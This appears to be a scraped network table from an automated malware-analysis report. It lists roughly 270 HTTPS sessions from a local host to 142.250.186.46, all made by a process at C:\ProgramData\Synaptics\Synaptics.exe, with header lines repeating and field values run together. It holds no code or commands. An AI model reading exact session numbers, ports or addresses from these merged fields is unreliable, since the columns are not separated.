                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        157192.168.2.349925142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        158192.168.2.349926142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        159192.168.2.349927142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        16192.168.2.349751142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        160192.168.2.349928142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        161192.168.2.349929142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        162192.168.2.349930142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        163192.168.2.349933142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        164192.168.2.349934142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        165192.168.2.349935142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        166192.168.2.349936142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        167192.168.2.349937142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        168192.168.2.349938142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        169192.168.2.349939142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        17192.168.2.349752142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        170192.168.2.349940142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        171192.168.2.349941142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        172192.168.2.349942142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        173192.168.2.349943142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        174192.168.2.349944142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        175192.168.2.349945142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        176192.168.2.349946142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        177192.168.2.349947142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        178192.168.2.349949142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        179192.168.2.349950142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        18192.168.2.349754142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        180192.168.2.349951142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        181192.168.2.349953142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        182192.168.2.349954142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        183192.168.2.349955142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        184192.168.2.349956142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        185192.168.2.349957142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        186192.168.2.349958142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        187192.168.2.349959142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        188192.168.2.349960142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        189192.168.2.349961142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        19192.168.2.349755142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        190192.168.2.349962142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        191192.168.2.349965142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        192192.168.2.349966142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        193192.168.2.349967142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        194192.168.2.349968142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        195192.168.2.349969142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        196192.168.2.349970142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        197192.168.2.349971142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        198192.168.2.349972142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        199192.168.2.349973142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        2192.168.2.349736142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        20192.168.2.349757142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        200192.168.2.349974142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        201192.168.2.349975142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        202192.168.2.349976142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        203192.168.2.349977142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        204192.168.2.349978142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        205192.168.2.349979142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        206192.168.2.349980142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        207192.168.2.349981142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        208192.168.2.349982142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        209192.168.2.349983142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        21192.168.2.349759142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        210192.168.2.349985142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        211192.168.2.349986142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        212192.168.2.349987142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        213192.168.2.349988142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        214192.168.2.349989142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        215192.168.2.349990142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        216192.168.2.349991142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        217192.168.2.349992142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        218192.168.2.349993142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        219192.168.2.349995142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        22192.168.2.349760142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        220192.168.2.349997142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        221192.168.2.349998142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        222192.168.2.349999142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        223192.168.2.350000142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        224192.168.2.350001142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        225192.168.2.350002142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        226192.168.2.350003142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        227192.168.2.350004142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        228192.168.2.350005142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        229192.168.2.350006142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        23192.168.2.349761142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        230192.168.2.350007142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        231192.168.2.350008142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        232192.168.2.350009142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        233192.168.2.350010142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        234192.168.2.350011142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        235192.168.2.350012142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        236192.168.2.350013142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        237192.168.2.350016142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        238192.168.2.350018142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        239192.168.2.350019142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        24192.168.2.349762142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        240192.168.2.350020142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        241192.168.2.350021142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        242192.168.2.350022142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        243192.168.2.350023142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        244192.168.2.350024142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        245192.168.2.350025142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        246192.168.2.350026142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        247192.168.2.350028142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        248192.168.2.350030142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        249192.168.2.350031142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        25192.168.2.349763142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        250192.168.2.350032142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        251192.168.2.350033142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        252192.168.2.350036142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        253192.168.2.350037142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        254192.168.2.350038142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        255192.168.2.350039142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        256192.168.2.350040142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        257192.168.2.350041142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        258192.168.2.350043142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        259192.168.2.350044142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        26192.168.2.349765142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        260192.168.2.350045142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        261192.168.2.350046142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        262192.168.2.350047142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        263192.168.2.350048142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        264192.168.2.350049142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        265192.168.2.350050142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        266192.168.2.350052142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        267192.168.2.350053142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        268192.168.2.350054142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        269192.168.2.350055142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
